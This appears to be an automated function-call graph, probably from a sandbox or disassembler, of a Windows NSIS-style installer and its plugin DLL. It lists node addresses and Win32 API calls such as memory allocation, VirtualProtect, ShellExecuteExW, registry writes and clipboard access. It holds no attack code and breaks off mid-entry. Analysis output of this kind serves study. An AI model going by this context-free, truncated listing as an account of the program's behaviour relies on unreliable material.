4679 705b196f GlobalFree 4677->4679 4679->4648 4683 705b1951 4683->4677 4777 705b15dd wsprintfW 4683->4777 4684 705b194a FreeLibrary 4684->4683 4686->4641 4780 705b12bb GlobalAlloc 4687->4780 4689 705b1c26 4781 705b12bb GlobalAlloc 4689->4781 4691 705b1e6b GlobalFree GlobalFree GlobalFree 4692 705b1e88 4691->4692 4705 705b1ed2 4691->4705 4694 705b227e 4692->4694 4702 705b1e9d 4692->4702 4692->4705 4693 705b1d26 GlobalAlloc 4713 705b1c31 4693->4713 4695 705b22a0 GetModuleHandleW 4694->4695 4694->4705 4696 705b22b1 LoadLibraryW 4695->4696 4697 705b22c6 4695->4697 4696->4697 4696->4705 4788 705b16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4697->4788 4698 705b1d71 lstrcpyW 4701 705b1d7b lstrcpyW 4698->4701 4699 705b1d8f GlobalFree 4699->4713 4701->4713 4702->4705 4784 705b12cc 4702->4784 4703 705b2318 4703->4705 4708 705b2325 lstrlenW 4703->4708 4704 705b2126 4787 705b12bb GlobalAlloc 4704->4787 4705->4647 4789 705b16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4708->4789 4709 705b22d8 4709->4703 4717 705b2302 GetProcAddress 4709->4717 4711 705b2067 GlobalFree 4711->4713 4712 705b21ae 4712->4705 4716 705b2216 lstrcpyW 4712->4716 4713->4691 4713->4693 4713->4698 4713->4699 4713->4701 4713->4704 4713->4705 4713->4711 4713->4712 4714 705b12cc 2 API calls 4713->4714 4782 705b162f GlobalSize GlobalAlloc 4713->4782 4714->4713 4716->4705 4717->4703 4718 705b212f 4718->4647 4726 705b2498 4719->4726 4721 705b25c1 GlobalFree 4724 705b186f 4721->4724 4721->4726 4722 705b256b GlobalAlloc CLSIDFromString 4722->4721 4723 705b2540 GlobalAlloc WideCharToMultiByte 4723->4721 4724->4657 4724->4658 4724->4669 4725 705b12cc GlobalAlloc lstrcpynW 4725->4726 4726->4721 4726->4722 4726->4723 4726->4725 4728 705b258a 4726->4728 4791 705b135a 4726->4791 4728->4721 4795 705b27a4 4728->4795 4731 705b2baa 4729->4731 4730 705b2c4f ReadFile 4734 705b2c6d 4730->4734 4731->4730 4733 705b2d39 4733->4669 4798 705b2b42 4734->4798 4736 705b2453 4735->4736 4737 705b245e GlobalAlloc 4736->4737 4738 705b1868 4736->4738 4737->4736 4738->4649 4743 705b2840 4739->4743 4740 705b28db GlobalAlloc 4744 705b28fe 4740->4744 4741 705b28ee 4742 705b28f4 GlobalSize 4741->4742 4741->4744 4742->4744 4743->4740 4743->4741 4744->4676 4746 705b2e2e 4745->4746 4747 705b2e6e GlobalFree 4746->4747 4802 705b12bb GlobalAlloc 4748->4802 4750 705b270b lstrcpynW 4753 705b265f 4750->4753 4751 705b26fa StringFromGUID2 4751->4753 4752 705b26d8 MultiByteToWideChar 4752->4753 4753->4750 4753->4751 4753->4752 4754 705b271e wsprintfW 4753->4754 4755 705b2742 GlobalFree 4753->4755 4756 705b2777 GlobalFree 4753->4756 4757 705b1312 2 API calls 4753->4757 4803 705b1381 4753->4803 4754->4753 4755->4753 4756->4664 4757->4753 4807 705b12bb GlobalAlloc 4759->4807 4761 705b1659 4762 705b1666 2 API calls 4761->4762 4763 705b1663 4762->4763 4764 705b1312 4763->4764 4765 705b131b GlobalAlloc lstrcpynW 4764->4765 4766 705b1355 GlobalFree 4764->4766 4765->4766 4766->4670 4768 705b169f lstrcpyW 4767->4768 4769 705b1672 wsprintfW 4767->4769 4772 705b16b8 4768->4772 4769->4772 4772->4674 4774 705b2626 4773->4774 4775 705b1931 4773->4775 4774->4775 4776 705b2642 GlobalFree 4774->4776 4775->4683 4775->4684 4776->4774 4778 705b1312 2 API calls 4777->4778 4779 705b15fe 4778->4779 4779->4677 4780->4689 4781->4713 4783 705b164d 4782->4783 4783->4713 4790 705b12bb GlobalAlloc 4784->4790 4786 705b12db lstrcpynW 4786->4705 4787->4718 4788->4709 4789->4705 4790->4786 4792 705b1361 4791->4792 4793 705b12cc 2 API calls 4792->4793 4794 705b137f 4793->4794 4794->4726 4796 705b2808 4795->4796 4797 705b27b2 VirtualAlloc 4795->4797 4796->4728 4797->4796 4799 705b2b4d 4798->4799 4800 705b2b5d 4799->4800 4801 705b2b52 GetLastError 4799->4801 4800->4733 4801->4800 4802->4753 4804 705b138a 4803->4804 4805 705b13ac 4803->4805 4804->4805 4806 705b1390 lstrcpyW 4804->4806 4805->4753 4806->4805 4807->4761 5114 404658 5115 404670 5114->5115 5122 40478a 5114->5122 5119 404499 18 API calls 5115->5119 5116 4047f4 5117 4048be 5116->5117 5118 4047fe GetDlgItem 5116->5118 5124 404500 8 API calls 5117->5124 5120 404818 5118->5120 5121 40487f 5118->5121 5123 4046d7 5119->5123 5120->5121 5127 40483e SendMessageW LoadCursorW SetCursor 5120->5127 5121->5117 5128 404891 5121->5128 5122->5116 5122->5117 5125 4047c5 GetDlgItem SendMessageW 5122->5125 5126 404499 18 API calls 5123->5126 5138 4048b9 5124->5138 5147 4044bb KiUserCallbackDispatcher 5125->5147 5131 4046e4 CheckDlgButton 5126->5131 5151 404907 5127->5151 5133 4048a7 5128->5133 5134 404897 SendMessageW 5128->5134 5130 4047ef 5148 4048e3 5130->5148 5145 4044bb KiUserCallbackDispatcher 5131->5145 5133->5138 5139 4048ad SendMessageW 5133->5139 5134->5133 5139->5138 5140 404702 GetDlgItem 5146 4044ce SendMessageW 5140->5146 5142 404718 SendMessageW 5143 404735 GetSysColor 5142->5143 5144 40473e SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5142->5144 5143->5144 5144->5138 5145->5140 5146->5142 5147->5130 5149 4048f1 5148->5149 5150 4048f6 SendMessageW 5148->5150 5149->5150 5150->5116 5154 405b63 ShellExecuteExW 5151->5154 5153 40486d LoadCursorW SetCursor 5153->5121 5154->5153 5155 705b2d43 5156 705b2d5b 5155->5156 5157 705b162f 2 API calls 5156->5157 5158 705b2d76 5157->5158 5159 402b59 5160 402b60 5159->5160 5161 402bab 5159->5161 5163 402d84 17 API calls 5160->5163 5165 402ba9 5160->5165 5162 40690a 5 API calls 5161->5162 5164 402bb2 5162->5164 5166 402b6e 5163->5166 5167 402da6 17 API calls 5164->5167 5168 402d84 17 API calls 5166->5168 5169 402bbb 5167->5169 5172 402b7a 5168->5172 5169->5165 5170 402bbf IIDFromString 5169->5170 5170->5165 5171 402bce 5170->5171 5171->5165 5177 40653d lstrcpynW 5171->5177 5176 406484 wsprintfW 5172->5176 5174 402beb CoTaskMemFree 5174->5165 5176->5165 5177->5174 4918 40175c 4919 402da6 17 API calls 4918->4919 4920 401763 4919->4920 4921 40605c 2 API calls 4920->4921 4922 40176a 4921->4922 4923 40605c 2 API calls 4922->4923 4923->4922 5178 401d5d 5179 402d84 17 API calls 5178->5179 5180 401d6e SetWindowLongW 5179->5180 5181 402c2a 5180->5181 4924 401ede 4925 402d84 17 API calls 4924->4925 4926 401ee4 4925->4926 4927 402d84 17 API calls 4926->4927 4928 401ef0 4927->4928 4929 401f07 EnableWindow 4928->4929 4930 401efc ShowWindow 4928->4930 4931 402c2a 4929->4931 4930->4931 4932 4056de 4933 405888 4932->4933 4934 4056ff GetDlgItem GetDlgItem GetDlgItem 4932->4934 4935 405891 GetDlgItem CreateThread FindCloseChangeNotification 4933->4935 4938 4058b9 4933->4938 4978 4044ce SendMessageW 4934->4978 4935->4938 4981 405672 5 API calls 4935->4981 4937 4058e4 4942 4058f0 4937->4942 4943 405944 4937->4943 4938->4937 4940 4058d0 ShowWindow ShowWindow 4938->4940 4941 405909 4938->4941 4939 40576f 4944 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4939->4944 4980 4044ce SendMessageW 4940->4980 4948 404500 8 API calls 4941->4948 4946 4058f8 4942->4946 4947 40591e ShowWindow 4942->4947 4943->4941 4951 405952 SendMessageW 4943->4951 4949 4057e4 4944->4949 4950 4057c8 SendMessageW SendMessageW 4944->4950 4952 404472 SendMessageW 4946->4952 4954 405930 4947->4954 4955 40593e 4947->4955 4953 405917 4948->4953 4957 4057f7 4949->4957 4958 4057e9 SendMessageW 4949->4958 4950->4949 4951->4953 4959 40596b CreatePopupMenu 4951->4959 4952->4941 4960 40559f 24 API calls 4954->4960 4956 404472 SendMessageW 4955->4956 4956->4943 4962 404499 18 API calls 4957->4962 4958->4957 4961 40657a 17 API calls 4959->4961 4960->4955 4963 40597b AppendMenuW 4961->4963 4964 405807 4962->4964 4965 405998 GetWindowRect 4963->4965 4966 4059ab TrackPopupMenu 4963->4966 4967 405810 ShowWindow 4964->4967 4968 405844 GetDlgItem SendMessageW 4964->4968 4965->4966 4966->4953 4969 4059c6 4966->4969 4970 405833 4967->4970 4971 405826 ShowWindow 4967->4971 4968->4953 4972 40586b SendMessageW SendMessageW 4968->4972 4973 4059e2 SendMessageW 4969->4973 4979 4044ce SendMessageW 4970->4979 4971->4970 4972->4953 4973->4973 4974 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4973->4974 4976 405a24 SendMessageW 4974->4976 4976->4976 4977 405a4d GlobalUnlock SetClipboardData CloseClipboard 4976->4977 4977->4953 4978->4939 4979->4968 4980->4937 5182 4028de 5183 4028e6 5182->5183 5184 4028ea FindNextFileW 5183->5184 5187 4028fc 5183->5187 5185 402943 5184->5185 5184->5187 5188 40653d lstrcpynW 5185->5188 5188->5187 5189 404ce0 5190 404cf0 5189->5190 5191 404d0c 5189->5191 5200 405b81 GetDlgItemTextW 5190->5200 5193 404d12 SHGetPathFromIDListW 5191->5193 5194 404d3f 5191->5194 5196 404d22 5193->5196 5199 404d29 SendMessageW 5193->5199 5195 404cfd SendMessageW 5195->5191 5198 40140b 2 API calls 5196->5198 5198->5199 5199->5194 5200->5195 5201 705b1979 5202 705b199c 5201->5202 5203 705b19e3 5202->5203 5204 705b19d1 GlobalFree 5202->5204 5205 705b1312 2 API calls 5203->5205 5204->5203 5206 705b1b6e GlobalFree GlobalFree 5205->5206 5207 401563 5208 402ba4 5207->5208 5211 406484 wsprintfW 5208->5211 5210 402ba9 5211->5210 4157 705b2a7f 4158 705b2acf 4157->4158 4159 705b2a8f VirtualProtect 4157->4159 4159->4158 5212 401de4 LoadImageW SendMessageW 5213 401e33 5212->5213 5215 401e3f 5212->5215 5214 401e38 DeleteObject 5213->5214 5213->5215 5214->5215 5216 401968 5217 402d84 17 API calls 5216->5217 5218 40196f 5217->5218 5219 402d84 17 API calls 5218->5219 5220 40197c 5219->5220 5221 402da6 17 API calls 5220->5221 5222 401993 lstrlenW 5221->5222 5224 4019a4 5222->5224 5223 4019e5 5224->5223 5228 40653d lstrcpynW 5224->5228 5226 4019d5 5226->5223 5227 4019da lstrlenW 5226->5227 5227->5223 5228->5226 5229 40166a 5230 402da6 17 API calls 5229->5230 5231 401670 5230->5231 5232 406873 2 API calls 5231->5232 5233 401676 5232->5233 5234 402aeb 5235 402d84 17 API calls 5234->5235 5237 402af1 5235->5237 5236 40292e 5237->5236 5238 40657a 17 API calls 5237->5238 5238->5236 4238 4026ec 4239 402d84 17 API calls 4238->4239 4248 4026fb 4239->4248 4240 402838 4241 402745 ReadFile 4241->4240 4241->4248 4242 4027de 4242->4240 4242->4248 4252 40610e SetFilePointer 4242->4252 4243 4060b0 ReadFile 4243->4248 4245 402785 MultiByteToWideChar 4245->4248 4246 40283a 4261 406484 wsprintfW 4246->4261 4248->4240 4248->4241 4248->4242 4248->4243 4248->4245 4248->4246 4249 4027ab SetFilePointer MultiByteToWideChar 4248->4249 4250 40284b 4248->4250 4249->4248 4250->4240 4251 40286c SetFilePointer 4250->4251 4251->4240 4253 40612a 4252->4253 4260 406142 4252->4260 4254 4060b0 ReadFile 4253->4254 4255 406136 4254->4255 4256 406173 SetFilePointer 4255->4256 4257 40614b SetFilePointer 4255->4257 4255->4260 4256->4260 4257->4256 4258 406156 4257->4258 4259 4060df WriteFile 4258->4259 4259->4260 4260->4242 4261->4240 4520 40176f 4521 402da6 17 API calls 4520->4521 4522 401776 4521->4522 4523 401796 4522->4523 4524 40179e 4522->4524 4559 40653d lstrcpynW 4523->4559 4560 40653d lstrcpynW 4524->4560 4527 4017a9 4529 405e0c 3 API calls 4527->4529 4528 40179c 4531 4067c4 5 API calls 4528->4531 4530 4017af lstrcatW 4529->4530 4530->4528 4535 4017bb 4531->4535 4532 406873 2 API calls 4532->4535 4534 406008 2 API calls 4534->4535 4535->4532 4535->4534 4536 4017cd CompareFileTime 4535->4536 4537 40188d 4535->4537 4544 40657a 17 API calls 4535->4544 4549 40653d lstrcpynW 4535->4549 4554 405b9d MessageBoxIndirectW 4535->4554 4557 401864 4535->4557 4558 40602d GetFileAttributesW CreateFileW 4535->4558 4536->4535 4538 40559f 24 API calls 4537->4538 4540 401897 4538->4540 4539 40559f 24 API calls 4555 401879 4539->4555 4541 4032b4 31 API calls 4540->4541 4542 4018aa 4541->4542 4543 4018be SetFileTime 4542->4543 4545 4018d0 FindCloseChangeNotification 4542->4545 4543->4545 4544->4535 4546 4018e1 4545->4546 4545->4555 4547 4018e6 4546->4547 4548 4018f9 4546->4548 4550 40657a 17 API calls 4547->4550 4551 40657a 17 API calls 4548->4551 4549->4535 4552 4018ee lstrcatW 4550->4552 4553 401901 4551->4553 4552->4553 4553->4555 4556 405b9d MessageBoxIndirectW 4553->4556 4554->4535 4556->4555 4557->4539 4557->4555 4558->4535 4559->4528 4560->4527 5239 705b1774 5240 705b17a3 5239->5240 5241 705b1bff 22 API calls 5240->5241 5242 705b17aa 5241->5242 5243 705b17bd 5242->5243 5244 705b17b1 5242->5244 5245 705b17c7 5243->5245 5246 705b17e4 5243->5246 5247 705b1312 2 API calls 5244->5247 5248 705b15dd 3 API calls 5245->5248 5249 705b17ea 5246->5249 5250 705b180e 5246->5250 5251 705b17bb 5247->5251 5253 705b17cc 5248->5253 5254 705b1654 3 API calls 5249->5254 5252 705b15dd 3 API calls 5250->5252 5252->5251 5255 705b1654 3 API calls 5253->5255 5256 705b17ef 5254->5256 5257 705b17d2 5255->5257 5258 705b1312 2 API calls 5256->5258 5259 705b1312 2 API calls 5257->5259 5260 705b17f5 GlobalFree 5258->5260 5261 705b17d8 GlobalFree 5259->5261 5260->5251 5262 705b1809 GlobalFree 5260->5262 5261->5251 5262->5251 5263 401a72 5264 402d84 17 API calls 5263->5264 5265 401a7b 5264->5265 5266 402d84 17 API calls 5265->5266 5267 401a20 5266->5267 5268 705b23e9 5269 705b2453 5268->5269 5270 705b245e GlobalAlloc 5269->5270 5271 705b247d 5269->5271 5270->5269 5272 401573 5273 401583 ShowWindow 5272->5273 5274 40158c 5272->5274 5273->5274 5275 402c2a 5274->5275 5276 40159a ShowWindow 5274->5276 5276->5275 5277 4023f4 5278 402da6 17 API calls 5277->5278 5279 402403 5278->5279 5280 402da6 17 API calls 5279->5280 5281 40240c 5280->5281 5282 402da6 17 API calls 5281->5282 5283 402416 GetPrivateProfileStringW 5282->5283 5284 4014f5 SetForegroundWindow 5285 402c2a 5284->5285 5286 401ff6 5287 402da6 17 API calls 5286->5287 5288 401ffd 5287->5288 5289 406873 2 API calls 5288->5289 5290 402003 5289->5290 5292 402014 5290->5292 5293 406484 wsprintfW 5290->5293 5293->5292 5294 401b77 5295 402da6 17 API calls 5294->5295 5296 401b7e 5295->5296 5297 402d84 17 API calls 5296->5297 5298 401b87 wsprintfW 5297->5298 5299 402c2a 5298->5299 5300 705b10e1 5310 705b1111 5300->5310 5301 705b12b0 GlobalFree 5302 705b11d7 GlobalAlloc 5302->5310 5303 705b1240 GlobalFree 5303->5310 5304 705b135a 2 API calls 5304->5310 5305 705b12ab 5305->5301 5306 705b1312 2 API calls 5306->5310 5307 705b129a GlobalFree 5307->5310 5308 705b1381 lstrcpyW 5308->5310 5309 705b116b GlobalAlloc 5309->5310 5310->5301 5310->5302 5310->5303 5310->5304 5310->5305 5310->5306 5310->5307 5310->5308 5310->5309 4904 40167b 4905 402da6 17 API calls 4904->4905 4906 401682 4905->4906 4907 402da6 17 API calls 4906->4907 4908 40168b 4907->4908 4909 402da6 17 API calls 4908->4909 4910 401694 MoveFileW 4909->4910 4911 4016a0 4910->4911 4912 4016a7 4910->4912 4914 401423 24 API calls 4911->4914 4913 406873 2 API calls 4912->4913 4916 4022f6 4912->4916 4915 4016b6 4913->4915 4914->4916 4915->4916 4917 4062fd 36 API calls 4915->4917 4917->4911 5311 4022ff 5312 402da6 17 API calls 5311->5312 5313 402305 5312->5313 5314 402da6 17 API calls 5313->5314 5315 40230e 5314->5315 5316 402da6 17 API calls 5315->5316 5317 402317 5316->5317 5318 406873 2 API calls 5317->5318 5319 402320 5318->5319 5320 402331 lstrlenW lstrlenW 5319->5320 5321 402324 5319->5321 5323 40559f 24 API calls 5320->5323 5322 40559f 24 API calls 5321->5322 5325 40232c 5321->5325 5322->5325 5324 40236f SHFileOperationW 5323->5324 5324->5321 5324->5325 5326 4019ff 5327 402da6 17 API calls 5326->5327 5328 401a06 5327->5328 5329 402da6 17 API calls 5328->5329 5330 401a0f 5329->5330 5331 401a16 lstrcmpiW 5330->5331 5332 401a28 lstrcmpW 5330->5332 5333 401a1c 5331->5333 5332->5333 5334 401000 5335 401037 BeginPaint GetClientRect 5334->5335 5336 40100c DefWindowProcW 5334->5336 5338 4010f3 5335->5338 5339 401179 5336->5339 5340 401073 CreateBrushIndirect FillRect DeleteObject 5338->5340 5341 4010fc 5338->5341 5340->5338 5342 401102 CreateFontIndirectW 5341->5342 5343 401167 EndPaint 5341->5343 5342->5343 5344 401112 6 API calls 5342->5344 5343->5339 5344->5343 5345 401503 5346 40150b 5345->5346 5348 40151e 5345->5348 5347 402d84 17 API calls 5346->5347 5347->5348 5349 402383 5350 40238a 5349->5350 5353 40239d 5349->5353 5351 40657a 17 API calls 5350->5351 5352 402397 5351->5352 5352->5353 5354 405b9d MessageBoxIndirectW 5352->5354 5354->5353 5355 402c05 SendMessageW 5356 402c2a 5355->5356 5357 402c1f InvalidateRect 5355->5357 5357->5356 5358 404f06 GetDlgItem GetDlgItem 5359 404f58 7 API calls 5358->5359 5366 40517d 5358->5366 5360 404ff2 SendMessageW 5359->5360 5361 404fff DeleteObject 5359->5361 5360->5361 5362 405008 5361->5362 5364 40503f 5362->5364 5365 40657a 17 API calls 5362->5365 5363 40525f 5368 40530b 5363->5368 5377 4052b8 SendMessageW 5363->5377 5401 405170 5363->5401 5367 404499 18 API calls 5364->5367 5371 405021 SendMessageW SendMessageW 5365->5371 5366->5363 5394 4051ec 5366->5394 5412 404e54 SendMessageW 5366->5412 5372 405053 5367->5372 5369 405315 SendMessageW 5368->5369 5370 40531d 5368->5370 5369->5370 5379 405336 5370->5379 5380 40532f ImageList_Destroy 5370->5380 5397 405346 5370->5397 5371->5362 5376 404499 18 API calls 5372->5376 5373 405251 SendMessageW 5373->5363 5374 404500 8 API calls 5378 40550c 5374->5378 5395 405064 5376->5395 5382 4052cd SendMessageW 5377->5382 5377->5401 5383 40533f GlobalFree 5379->5383 5379->5397 5380->5379 5381 4054c0 5386 4054d2 ShowWindow GetDlgItem ShowWindow 5381->5386 5381->5401 5385 4052e0 5382->5385 5383->5397 5384 40513f GetWindowLongW SetWindowLongW 5387 405158 5384->5387 5390 4052f1 SendMessageW 5385->5390 5386->5401 5388 405175 5387->5388 5389 40515d ShowWindow 5387->5389 5411 4044ce SendMessageW 5388->5411 5410 4044ce SendMessageW 5389->5410 5390->5368 5391 40513a 5391->5384 5391->5387 5394->5363 5394->5373 5395->5384 5395->5391 5396 4050b7 SendMessageW 5395->5396 5398 4050f5 SendMessageW 5395->5398 5399 405109 SendMessageW 5395->5399 5396->5395 5397->5381 5404 405381 5397->5404 5417 404ed4 5397->5417 5398->5395 5399->5395 5401->5374 5402 40548b 5403 405496 InvalidateRect 5402->5403 5406 4054a2 5402->5406 5403->5406 5405 4053af SendMessageW 5404->5405 5408 4053c5 5404->5408 5405->5408 5406->5381 5426 404e0f 5406->5426 5407 405439 SendMessageW SendMessageW 5407->5408 5408->5402 5408->5407 5410->5401 5411->5366 5413 404eb3 SendMessageW 5412->5413 5414 404e77 GetMessagePos ScreenToClient SendMessageW 5412->5414 5416 404eab 5413->5416 5415 404eb0 5414->5415 5414->5416 5415->5413 5416->5394 5429 40653d lstrcpynW 5417->5429 5419 404ee7 5430 406484 wsprintfW 5419->5430 5421 404ef1 5422 40140b 2 API calls 5421->5422 5423 404efa 5422->5423 5431 40653d lstrcpynW 5423->5431 5425 404f01 5425->5404 5432 404d46 5426->5432 5428 404e24 5428->5381 5429->5419 5430->5421 5431->5425 5433 404d5f 5432->5433 5434 40657a 17 API calls 5433->5434 5435 404dc3 5434->5435 5436 40657a 17 API calls 5435->5436 5437 404dce 5436->5437 5438 40657a 17 API calls 5437->5438 5439 404de4 lstrlenW wsprintfW SetDlgItemTextW 5438->5439 5439->5428 5440 404609 lstrlenW 5441 404628 5440->5441 5442 40462a WideCharToMultiByte 5440->5442 5441->5442 4186 40248a 4187 402da6 17 API calls 4186->4187 4188 40249c 4187->4188 4189 402da6 17 API calls 4188->4189 4190 4024a6 4189->4190 4203 402e36 4190->4203 4193 4024de 4196 4024ea 4193->4196 4207 402d84 4193->4207 4194 402c2a 4195 402da6 17 API calls 4197 4024d4 lstrlenW 4195->4197 4199 402509 RegSetValueExW 4196->4199 4210 4032b4 4196->4210 4197->4193 4201 40251f RegCloseKey 4199->4201 4201->4194 4204 402e51 4203->4204 4230 4063d8 4204->4230 4208 40657a 17 API calls 4207->4208 4209 402d99 4208->4209 4209->4196 4211 4032cd 4210->4211 4212 4032fb 4211->4212 4237 4034e5 SetFilePointer 4211->4237 4234 4034cf 4212->4234 4216 403468 4218 4034aa 4216->4218 4222 40346c 4216->4222 4217 403318 GetTickCount 4221 403452 4217->4221 4228 403367 4217->4228 4220 4034cf ReadFile 4218->4220 4219 4034cf ReadFile 4219->4228 4220->4221 4221->4199 4222->4221 4223 4034cf ReadFile 4222->4223 4224 4060df WriteFile 4222->4224 4223->4222 4224->4222 4225 4033bd GetTickCount 4225->4228 4226 4033e2 MulDiv wsprintfW 4227 40559f 24 API calls 4226->4227 4227->4228 4228->4219 4228->4221 4228->4225 4228->4226 4229 4060df WriteFile 4228->4229 4229->4228 4231 4063e7 4230->4231 4232 4063f2 RegCreateKeyExW 4231->4232 4233 4024b6 4231->4233 4232->4233 4233->4193 4233->4194 4233->4195 4235 4060b0 ReadFile 4234->4235 4236 403306 4235->4236 4236->4216 4236->4217 4236->4221 4237->4212 5443 40498a 5444 4049b6 5443->5444 5445 4049c7 5443->5445 5504 405b81 GetDlgItemTextW 5444->5504 5447 4049d3 GetDlgItem 5445->5447 5449 404a32 5445->5449 5448 4049e7 5447->5448 5453 4049fb SetWindowTextW 5448->5453 5456 405eb7 4 API calls 5448->5456 5450 404b16 5449->5450 5458 40657a 17 API calls 5449->5458 5502 404cc5 5449->5502 5450->5502 5506 405b81 GetDlgItemTextW 5450->5506 5451 4049c1 5452 4067c4 5 API calls 5451->5452 5452->5445 5457 404499 18 API calls 5453->5457 5455 404500 8 API calls 5460 404cd9 5455->5460 5461 4049f1 5456->5461 5462 404a17 5457->5462 5463 404aa6 SHBrowseForFolderW 5458->5463 5459 404b46 5464 405f14 18 API calls 5459->5464 5461->5453 5468 405e0c 3 API calls 5461->5468 5465 404499 18 API calls 5462->5465 5463->5450 5466 404abe CoTaskMemFree 5463->5466 5467 404b4c 5464->5467 5469 404a25 5465->5469 5470 405e0c 3 API calls 5466->5470 5507 40653d lstrcpynW 5467->5507 5468->5453 5505 4044ce SendMessageW 5469->5505 5472 404acb 5470->5472 5475 404b02 SetDlgItemTextW 5472->5475 5479 40657a 17 API calls 5472->5479 5474 404a2b 5477 40690a 5 API calls 5474->5477 5475->5450 5476 404b63 5478 40690a 5 API calls 5476->5478 5477->5449 5485 404b6a 5478->5485 5480 404aea lstrcmpiW 5479->5480 5480->5475 5482 404afb lstrcatW 5480->5482 5481 404bab 5508 40653d lstrcpynW 5481->5508 5482->5475 5484 404bb2 5486 405eb7 4 API calls 5484->5486 5485->5481 5490 405e58 2 API calls 5485->5490 5491 404c03 5485->5491 5487 404bb8 GetDiskFreeSpaceW 5486->5487 5489 404bdc MulDiv 5487->5489 5487->5491 5489->5491 5490->5485 5492 404c74 5491->5492 5494 404e0f 20 API calls 5491->5494 5493 404c97 5492->5493 5495 40140b 2 API calls 5492->5495 5509 4044bb KiUserCallbackDispatcher 5493->5509 5496 404c61 5494->5496 5495->5493 5498 404c76 SetDlgItemTextW 5496->5498 5499 404c66 5496->5499 5498->5492 5500 404d46 20 API calls 5499->5500 5500->5492 5501 404cb3 5501->5502 5503 4048e3 SendMessageW 5501->5503 5502->5455 5503->5502 5504->5451 5505->5474 5506->5459 5507->5476 5508->5484 5509->5501 5510 40290b 5511 402da6 17 API calls 5510->5511 5512 402912 FindFirstFileW 5511->5512 5513 402925 5512->5513 5514 40293a 5512->5514 5516 402943 5514->5516 5518 406484 wsprintfW 5514->5518 5519 40653d lstrcpynW 5516->5519 5518->5516 5519->5513 5520 40190c 5521 401943 5520->5521 5522 402da6 17 API calls 5521->5522 5523 401948 5522->5523 5524 405c49 67 API calls 5523->5524 5525 401951 5524->5525 5526 40190f 5527 402da6 17 API calls 5526->5527 5528 401916 5527->5528 5529 405b9d MessageBoxIndirectW 5528->5529 5530 40191f 5529->5530 4561 402891 4562 402898 4561->4562 4563 402ba9 4561->4563 4564 402d84 17 API calls 4562->4564 4565 40289f 4564->4565 4566 4028ae SetFilePointer 4565->4566 4566->4563 4567 4028be 4566->4567 4569 406484 wsprintfW 4567->4569 4569->4563 5531 401491 5532 40559f 24 API calls 5531->5532 5533 401498 5532->5533 5534 401f12 5535 402da6 17 API calls 5534->5535 5536 401f18 5535->5536 5537 402da6 17 API calls 5536->5537 5538 401f21 5537->5538 5539 402da6 17 API calls 5538->5539 5540 401f2a 5539->5540 5541 402da6 17 API calls 5540->5541 5542 401f33 5541->5542 5543 401423 24 API calls 5542->5543 5544 401f3a 5543->5544 5551 405b63 ShellExecuteExW 5544->5551 5546 401f82 5547 4069b5 5 API calls 5546->5547 5549 40292e 5546->5549 5548 401f9f FindCloseChangeNotification 5547->5548 5548->5549 5551->5546 5552 405513 5553 405523 5552->5553 5554 405537 5552->5554 5556 405580 5553->5556 5557 405529 5553->5557 5555 40553f IsWindowVisible 5554->5555 5563 405556 5554->5563 5555->5556 5558 40554c 5555->5558 5559 405585 CallWindowProcW 5556->5559 5560 4044e5 SendMessageW 5557->5560 5561 404e54 5 API calls 5558->5561 5562 405533 5559->5562 5560->5562 5561->5563 5563->5559 5564 404ed4 4 API calls 5563->5564 5564->5556 5565 402f93 5566 402fa5 SetTimer 5565->5566 5567 402fbe 5565->5567 5566->5567 5568 403013 5567->5568 5569 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5567->5569 5569->5568 5570 705b170d 5571 705b15b6 GlobalFree 5570->5571 5573 705b1725 5571->5573 5572 705b176b GlobalFree 5573->5572 5574 705b1740 5573->5574 5575 705b1757 VirtualFree 5573->5575 5574->5572 5575->5572 5576 401d17 5577 402d84 17 API calls 5576->5577 5578 401d1d IsWindow 5577->5578 5579 401a20 5578->5579 4808 403f9a 4809 403fb2 4808->4809 4810 404113 4808->4810 4809->4810 4812 403fbe 4809->4812 4811 404124 GetDlgItem GetDlgItem 4810->4811 4818 404164 4810->4818 4813 404499 18 API calls 4811->4813 4815 403fc9 SetWindowPos 4812->4815 4816 403fdc 4812->4816 4817 40414e SetClassLongW 4813->4817 4814 4041be 4819 4044e5 SendMessageW 4814->4819 4828 40410e 4814->4828 4815->4816 4820 403fe5 ShowWindow 4816->4820 4821 404027 4816->4821 4824 40140b 2 API calls 4817->4824 4818->4814 4827 401389 2 API calls 4818->4827 4851 4041d0 4819->4851 4822 404100 4820->4822 4823 404005 GetWindowLongW 4820->4823 4825 404046 4821->4825 4826 40402f DestroyWindow 4821->4826 4890 404500 4822->4890 4823->4822 4829 40401e ShowWindow 4823->4829 4824->4818 4831 40404b SetWindowLongW 4825->4831 4832 40405c 4825->4832 4830 404422 4826->4830 4833 404196 4827->4833 4829->4821 4830->4828 4839 404453 ShowWindow 4830->4839 4831->4828 4832->4822 4837 404068 GetDlgItem 4832->4837 4833->4814 4838 40419a SendMessageW 4833->4838 4835 40140b 2 API calls 4835->4851 4836 404424 DestroyWindow EndDialog 4836->4830 4840 404096 4837->4840 4841 404079 SendMessageW IsWindowEnabled 4837->4841 4838->4828 4839->4828 4843 4040a3 4840->4843 4846 4040ea SendMessageW 4840->4846 4847 4040b6 4840->4847 4854 40409b 4840->4854 4841->4828 4841->4840 4842 40657a 17 API calls 4842->4851 4843->4846 4843->4854 4845 404499 18 API calls 4845->4851 4846->4822 4848 4040d3 4847->4848 4849 4040be 4847->4849 4853 40140b 2 API calls 4848->4853 4852 40140b 2 API calls 4849->4852 4850 4040d1 4850->4822 4851->4828 4851->4835 4851->4836 4851->4842 4851->4845 4872 404364 DestroyWindow 4851->4872 4881 404499 4851->4881 4852->4854 4855 4040da 4853->4855 4887 404472 4854->4887 4855->4822 4855->4854 4857 40424b GetDlgItem 4858 404260 4857->4858 4859 404268 ShowWindow KiUserCallbackDispatcher 4857->4859 4858->4859 4884 4044bb KiUserCallbackDispatcher 4859->4884 4861 404292 EnableWindow 4866 4042a6 4861->4866 4862 4042ab GetSystemMenu EnableMenuItem SendMessageW 4863 4042db SendMessageW 4862->4863 4862->4866 4863->4866 4865 403f7b 18 API calls 4865->4866 4866->4862 4866->4865 4885 4044ce SendMessageW 4866->4885 4886 40653d lstrcpynW 4866->4886 4868 